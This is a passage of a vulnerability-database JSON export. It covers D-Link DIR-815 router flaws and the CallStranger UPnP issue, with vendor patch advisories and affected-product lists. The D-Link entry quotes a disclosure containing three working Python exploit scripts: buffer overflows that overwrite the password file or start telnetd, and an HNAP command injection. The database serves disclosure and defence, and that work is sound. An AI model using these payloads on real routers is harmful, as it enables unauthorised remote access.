"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. \nA buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. ## Advisory Information\n\nTitle: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities\nVendors contacted: William Brown \u003cwilliam.brown@dlink.com\u003e, Patrick Cline patrick.cline@dlink.com(Dlink)\nCVE: None\n\nNote: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, \nhttp://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061\n\nHowever, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. \n\n## Product Description\n\nDIR-815 -- Wireless N300 Dual Band Router. Mainly used by home and small offices. \n\n## Vulnerabilities Summary\n\nHave come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. \n\n## Details\n\nBuffer overflow in auth \n----------------------------------------------------------------------------------------------------------------------\nimport urllib\nimport urllib2\n\n# This exploits the auth_main.cgi with read buffer overflow exploit for v2.02\n# prequisite is just to have id and password fields in params\n\nurl = \u0027http://192.168.0.1/authentication.cgi\u0027\njunk = \"A\"*1004+\"B\"*37+\"\\x58\\xf8\\x40\\x00\" # address of system function in executable\njunk+=\"X\"*164+\u0027echo \"Admin\" \"Admin\" \"0\" \u003e /var/passwd\\x00\u0027+\"AAAA\"\nvalues = \"id=test\u0026password=test\u0026test=\"+junk\n\n\nreq = urllib2.Request(url, values)\nresponse = urllib2.urlopen(req)\nthe_page = response.read()\n\n----------------------------------------------------------------------------------------------------------------------\n\nBuffer overflow in HNAP\n----------------------------------------------------------------------------------------------------------------------\nimport socket\nimport struct\n\n\n# format junk+ROP1(have right value in A0) + ROP2(add or subtract to create right system address) + ROP3(Jump to right address)\n\nbuf = \"POST /HNAP1/ HTTP/1.0\\r\\nHOST: 192.168.1.8\\r\\nUser-Agent: test\\r\\nContent-Length: 1\\r\\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX\" + \";sh;\"+\"H\"*286 \nbuf+= \"\\x40\\xF4\\xB1\\x2A\" # (ROP gadget which puts right value in A0)\nbuf+= \"B\"*20+\"ZZZZ\"+\"telnetd -p 6778\"+\"C\"*5 # adjustment to get to the right payload\nbuf+=\"\\xA0\\xb2\\xb4\\x2a\" # The system address is 2Ab4b200 so changing that in GDB just before jumping to test if it works which it does not\nbuf+= \"\\r\\n\" + \"1\\r\\n\\r\\n\"\n \nprint \"[+] sending buffer size\", len(buf)\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((\"1.2.3.4\", 80))\ns.send(buf)\n\n\n----------------------------------------------------------------------------------------------------------------------\n\nCommand injection in \n----------------------------------------------------------------------------------------------------------------------\nimport socket\nimport struct\n\n# CSRF or any other trickery, but probably only works when connected to network I suppose \n\nbuf = \"POST /HNAP1/ HTTP/1.0\\r\\nHOST: 99.249.143.124\\r\\nUser-Agent: test\\r\\nContent-Length: 1\\r\\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX\" + \u0027;telnetd -p 9090;\\r\\n\u0027 + \"1\\r\\n\\r\\n\"\n \nprint \"[+] sending buffer size\", len(buf)\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((\"192.168.0.1\", 80))\ns.send(buf)\n\n----------------------------------------------------------------------------------------------------------------------\n\n## Report Timeline\n\n* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. \n* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor\n* Nov 13, 2015: A public advisory is sent to security mailing lists. \n\n## Credit\n\nThis vulnerability was found by Samuel Huntley (samhuntley84@gmail.com)",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
},
{
"db": "PACKETSTORM",
"id": "134368"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "76012",
"trust": 1.2
},
{
"db": "BID",
"id": "76014",
"trust": 1.2
},
{
"db": "CNVD",
"id": "CNVD-2015-05077",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2015-05076",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011",
"trust": 0.6
},
{
"db": "DLINK",
"id": "SAP10061",
"trust": 0.1
},
{
"db": "DLINK",
"id": "SAP10060",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "134368",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"db": "PACKETSTORM",
"id": "134368"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
]
},
"id": "VAR-201507-0645",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 1.2
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
]
},
"last_update_date": "2024-07-23T22:41:18.832000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for multiple D-Link product UPnP buffer overflow vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/61829"
},
{
"title": "Patch for multiple D-Link product HTTP buffer overflow vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/61827"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/76012"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/76014"
},
{
"trust": 0.1,
"url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10060,"
},
{
"trust": 0.1,
"url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10061"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/authentication.cgi\u0027"
},
{
"trust": 0.1,
"url": "http://purenetworks.com/hnap1/getdevicesettings/xx\""
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"db": "PACKETSTORM",
"id": "134368"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"db": "PACKETSTORM",
"id": "134368"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-08-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"date": "2015-08-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"date": "2015-11-16T17:32:23",
"db": "PACKETSTORM",
"id": "134368"
},
{
"date": "2015-07-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"date": "2015-07-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-08-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"date": "2015-08-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"date": "2015-08-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"date": "2015-08-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple D-Link Product UPnP Buffer Overflow Vulnerabilities",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
],
"trust": 1.2
}
}
VAR-202006-0391
Vulnerability from variot - Updated: 2024-07-23 21:20The Open Connectivity Foundation UPnP specification before 2020-04-17 does not forbid the acceptance of a subscription request with a delivery URL on a different network segment than the fully qualified event-subscription URL, aka the CallStranger issue. The Universal Plug and Play (UPnP) protocol in effect prior to April 17, 2020 can be abused to send traffic to arbitrary destinations using the SUBSCRIBE functionality. The UPnP protocol, as specified by the Open Connectivity Foundation (OCF), is designed to provide automatic discovery and interaction with devices on a network. The UPnP protocol is designed to be used in a trusted local area network (LAN) and the protocol does not implement any form of authentication or verification. Many common Internet-connected devices support UPnP, as noted in previous research from Daniel Garcia (VU#357851) and Rapid7. Garcia presented at DEFCON 2019 and published a scanning and portmapping tool. The UPnP Device Protection service was not widely adopted. A vulnerability in the UPnP SUBSCRIBE capability permits an attacker to send large amounts of data to arbitrary destinations accessible over the Internet, which could lead to a Distributed Denial of Service (DDoS), data exfiltration, and other unexpected network behavior. The OCF has updated the UPnP specification to address this issue. This vulnerability has been assigned CVE-2020-12695 and is also known as Call Stranger. Although offering UPnP services on the Internet is generally considered to be a misconfiguration, a number of devices are still available over the Internet according to a recent Shodan scan. A remote, unauthenticated attacker may be able to abuse the UPnP SUBSCRIBE capability to send traffic to arbitrary destinations, leading to amplified DDoS attacks and data exfiltration. In general, making UPnP available over the the Internet can pose further security vulnerabilities than the one described in this vulnerability note. Open Connectivity Foundation UPnP There is a vulnerability in the specification regarding improper default permissions.Information is obtained and service operation is interrupted (DoS) It may be put into a state. A security vulnerability exists in UPnP versions prior to 2020-04-17. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: gssdp and gupnp security update Advisory ID: RHSA-2021:1789-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:1789 Issue date: 2021-05-18 CVE Names: CVE-2020-12695 ==================================================================== 1. Summary:
An update for gssdp and gupnp is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat CodeReady Linux Builder (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64 Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64
- Description:
GUPnP is an object-oriented open source framework for creating UPnP devices and control points, written in C using GObject and libsoup. The GUPnP API is intended to be easy to use, efficient and flexible.
GSSDP implements resource discovery and announcement over SSDP and is part of gUPnP.
The following packages have been upgraded to a later upstream version: gssdp (1.0.5), gupnp (1.0.6). (BZ#1846589, BZ#1861928)
Security Fix(es):
- hostapd: UPnP SUBSCRIBE misbehavior in WPS AP (CVE-2020-12695)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.4 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1846006 - CVE-2020-12695 hostapd: UPnP SUBSCRIBE misbehavior in WPS AP
- Package List:
Red Hat Enterprise Linux AppStream (v. 8):
Source: gssdp-1.0.5-1.el8.src.rpm gupnp-1.0.6-1.el8.src.rpm
aarch64: gssdp-1.0.5-1.el8.aarch64.rpm gssdp-debuginfo-1.0.5-1.el8.aarch64.rpm gssdp-debugsource-1.0.5-1.el8.aarch64.rpm gssdp-utils-debuginfo-1.0.5-1.el8.aarch64.rpm gupnp-1.0.6-1.el8.aarch64.rpm gupnp-debuginfo-1.0.6-1.el8.aarch64.rpm gupnp-debugsource-1.0.6-1.el8.aarch64.rpm
ppc64le: gssdp-1.0.5-1.el8.ppc64le.rpm gssdp-debuginfo-1.0.5-1.el8.ppc64le.rpm gssdp-debugsource-1.0.5-1.el8.ppc64le.rpm gssdp-utils-debuginfo-1.0.5-1.el8.ppc64le.rpm gupnp-1.0.6-1.el8.ppc64le.rpm gupnp-debuginfo-1.0.6-1.el8.ppc64le.rpm gupnp-debugsource-1.0.6-1.el8.ppc64le.rpm
s390x: gssdp-1.0.5-1.el8.s390x.rpm gssdp-debuginfo-1.0.5-1.el8.s390x.rpm gssdp-debugsource-1.0.5-1.el8.s390x.rpm gssdp-utils-debuginfo-1.0.5-1.el8.s390x.rpm gupnp-1.0.6-1.el8.s390x.rpm gupnp-debuginfo-1.0.6-1.el8.s390x.rpm gupnp-debugsource-1.0.6-1.el8.s390x.rpm
x86_64: gssdp-1.0.5-1.el8.i686.rpm gssdp-1.0.5-1.el8.x86_64.rpm gssdp-debuginfo-1.0.5-1.el8.i686.rpm gssdp-debuginfo-1.0.5-1.el8.x86_64.rpm gssdp-debugsource-1.0.5-1.el8.i686.rpm gssdp-debugsource-1.0.5-1.el8.x86_64.rpm gssdp-utils-debuginfo-1.0.5-1.el8.i686.rpm gssdp-utils-debuginfo-1.0.5-1.el8.x86_64.rpm gupnp-1.0.6-1.el8.i686.rpm gupnp-1.0.6-1.el8.x86_64.rpm gupnp-debuginfo-1.0.6-1.el8.i686.rpm gupnp-debuginfo-1.0.6-1.el8.x86_64.rpm gupnp-debugsource-1.0.6-1.el8.i686.rpm gupnp-debugsource-1.0.6-1.el8.x86_64.rpm
Red Hat CodeReady Linux Builder (v. 8):
aarch64: gssdp-debuginfo-1.0.5-1.el8.aarch64.rpm gssdp-debugsource-1.0.5-1.el8.aarch64.rpm gssdp-devel-1.0.5-1.el8.aarch64.rpm gssdp-utils-debuginfo-1.0.5-1.el8.aarch64.rpm gupnp-debuginfo-1.0.6-1.el8.aarch64.rpm gupnp-debugsource-1.0.6-1.el8.aarch64.rpm gupnp-devel-1.0.6-1.el8.aarch64.rpm
noarch: gssdp-docs-1.0.5-1.el8.noarch.rpm
ppc64le: gssdp-debuginfo-1.0.5-1.el8.ppc64le.rpm gssdp-debugsource-1.0.5-1.el8.ppc64le.rpm gssdp-devel-1.0.5-1.el8.ppc64le.rpm gssdp-utils-debuginfo-1.0.5-1.el8.ppc64le.rpm gupnp-debuginfo-1.0.6-1.el8.ppc64le.rpm gupnp-debugsource-1.0.6-1.el8.ppc64le.rpm gupnp-devel-1.0.6-1.el8.ppc64le.rpm
s390x: gssdp-debuginfo-1.0.5-1.el8.s390x.rpm gssdp-debugsource-1.0.5-1.el8.s390x.rpm gssdp-devel-1.0.5-1.el8.s390x.rpm gssdp-utils-debuginfo-1.0.5-1.el8.s390x.rpm gupnp-debuginfo-1.0.6-1.el8.s390x.rpm gupnp-debugsource-1.0.6-1.el8.s390x.rpm gupnp-devel-1.0.6-1.el8.s390x.rpm
x86_64: gssdp-debuginfo-1.0.5-1.el8.i686.rpm gssdp-debuginfo-1.0.5-1.el8.x86_64.rpm gssdp-debugsource-1.0.5-1.el8.i686.rpm gssdp-debugsource-1.0.5-1.el8.x86_64.rpm gssdp-devel-1.0.5-1.el8.i686.rpm gssdp-devel-1.0.5-1.el8.x86_64.rpm gssdp-utils-debuginfo-1.0.5-1.el8.i686.rpm gssdp-utils-debuginfo-1.0.5-1.el8.x86_64.rpm gupnp-debuginfo-1.0.6-1.el8.i686.rpm gupnp-debuginfo-1.0.6-1.el8.x86_64.rpm gupnp-debugsource-1.0.6-1.el8.i686.rpm gupnp-debugsource-1.0.6-1.el8.x86_64.rpm gupnp-devel-1.0.6-1.el8.i686.rpm gupnp-devel-1.0.6-1.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2020-12695 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.4_release_notes/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYKPxUtzjgjWX9erEAQhZhw//Ypgq/0qu2SS/hw8alPmqQ6CG5C/xOqF6 uJL5HVQ+KPu8Go+UifB3xP3Izm9GYh9aNpcR3bPTx3NsfJdQyzPNSo8O2bC3mUBl Lw6Bh++uhaNx3ADaKfceEG5teXbkwAadSft0W7j9jiY70qjVWfvqKjzBS3UyOL/P ++SdPU96uOX9nAkeT3wqirWjXDjUMJLao6AvRtXOXJ2MNwJp436S/KemSkMq2Mg7 izSYf7Biojg5SMNM4rsFBSnIqmehomfsVFetttHImCfTYteTfddti42gMelZyG8k MK4CJw1DeR1e30teWaHnoVa9xAPJMKx56RG3/Wr+6Y5nK0rFZoZuMiJn2b7KodcH fYbfxkwrQQ/R9bYZn03YgCz4zl/hetsoITKFHcsPNB9qtdRdtQhYzeOG+AyiawWh YtF3vlomMlaxuOZV9zTJUIWZX/ev6wWx8VsXuHKMBwtBxO7l3M0Hd+BOxRPVE/mu m+DBcBQp7fvaw55tCAQtHS3CKvgGYijDvOFHBOkQw5Zh9ttdfLlKo4H4NU0W4dLN HJWuKGelB2vGc0eoqZ7yCi2xuWBYxjDIoYGzlwPJSnrrguqeLfOKVykja8AYpIET V/XCUk/geIiEbSRwAR8EPXDpTLLicGrR6pbekpMfALm/GGc5I4RyA9AbVNJ9fF+a 7bb2GlcOcWo=2GSN -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . (CVE-2020-12695)
It was discovered that ReadyMedia (MiniDLNA) allowed remote code execution. ========================================================================= Ubuntu Security Notice USN-4734-2 February 16, 2021
wpa vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 ESM
Summary:
Several security issues were fixed in wpa_supplicant and hostapd.
Software Description: - wpa: client support for WPA and WPA2
Details:
USN-4734-1 fixed several vulnerabilities in wpa_supplicant. This update provides the corresponding update for Ubuntu 14.04 ESM.
It was discovered that wpa_supplicant did not properly handle P2P (Wi-Fi Direct) group information in some situations, leading to a heap overflow. A physically proximate attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2021-0326)
It was discovered that hostapd did not properly handle UPnP subscribe messages in some circumstances. An attacker could use this to cause a denial of service. (CVE-2020-12695)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 ESM: hostapd 1:2.1-0ubuntu1.7+esm3 wpasupplicant 2.1-0ubuntu1.7+esm3
After a standard system update you need to reboot your computer to make all the necessary changes.
For the stable distribution (buster), these problems have been fixed in version 2:2.7+git20190128+0c1e29f-6+deb10u3.
We recommend that you upgrade your wpa packages.
For the detailed security status of wpa please refer to its security tracker page at: https://security-tracker.debian.org/tracker/wpa
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmCBxcZfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0QRbw//chJxW9vhszfe/MrHkuEBC/y0jzkQ0GxJG/DT+EXvHnq8KyVht92B81sU Ia860UeNygOY1vAe8izNVpxPEi1PpI7Y6VfvqcWC5dMFNEmOk8yMzJXPDYtwrO3b q7Fq6MJys6HTooIInCVjdwVTmvVfocEiOl2Oy+smBE8ylkUPIShJj+UsnBR3qMCB 9IoxgeFsHl4HpRzsC1uiTMmNPUqqychqzyn26aA+Vp5nfPkvpsSc6aA68BBUm529 5udANpQneYrsQ+EKMm2wQmw9xNWbrqzRUCmi/XGxJ5YEibOjMLZeBMWq35MRQKDS BaaEPbjPMbBP7p6yp795pdt/XgNL1cJPejEBBQWPs3PrRuW/inhjJbSvenPl5AIB wOV8OzoxDw0m5DdYr2IuYRNu3zt743e/v5oDhDOiSteBl7zjs4cUohfOryaH/htN 7Ok3BbhfVc7xfW/XhXNq2axXPGDdSOI3Y6ZXPgiTlX3eIm8Culg7Rm52JprbAc0a aP0pkGjHO3MAIsvRU/H7WGJbhCdS0i/XTAbuJming5zzCpigGaQG9wOawYH4lNJV BNEX/DjjcsZ4oETxWn0sG/LVIl3m2TCry2cayZsy8806nTqlhFS2py5tx6gn5NBi e5JGaYRgwa6TUxj4UjWnbdIKMpElbtXbMIOHSvG2Gnx/21siyg0= =CU/j -----END PGP SIGNATURE----- . In addition minidlna was susceptible to the "CallStranger" UPnP vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202006-0391",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "envy photo 7100 z3m52a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "windows 10",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": null
},
{
"model": "deskjet ink advantage 4538 f0v66b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 7640",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy pro 6452 5se47a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "5020 z4a69a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 6055 5se16a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6232 k7g26b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 110 cq809c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 120 cz022c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4500 a9t80a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4525 k9t09b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5541 k7g89a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6222 y0k13d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4516 k9h52a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy pro 6420 5se45b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5646 f8b05a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4505 a9t86a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4652 k9v84b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4652 f1j02a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 6540 b9s59a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 3545 a9t81a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "32"
},
{
"model": "xp-702",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy 4507 e6g70b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7100 k7g93a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4508 e6g72b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4520 e6g67b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 111 cq810a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6234 k7s21b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7800 k7r96a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 7645 e4w44a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4675 f1h97c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4652 f1j05b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-960",
"scope": "eq",
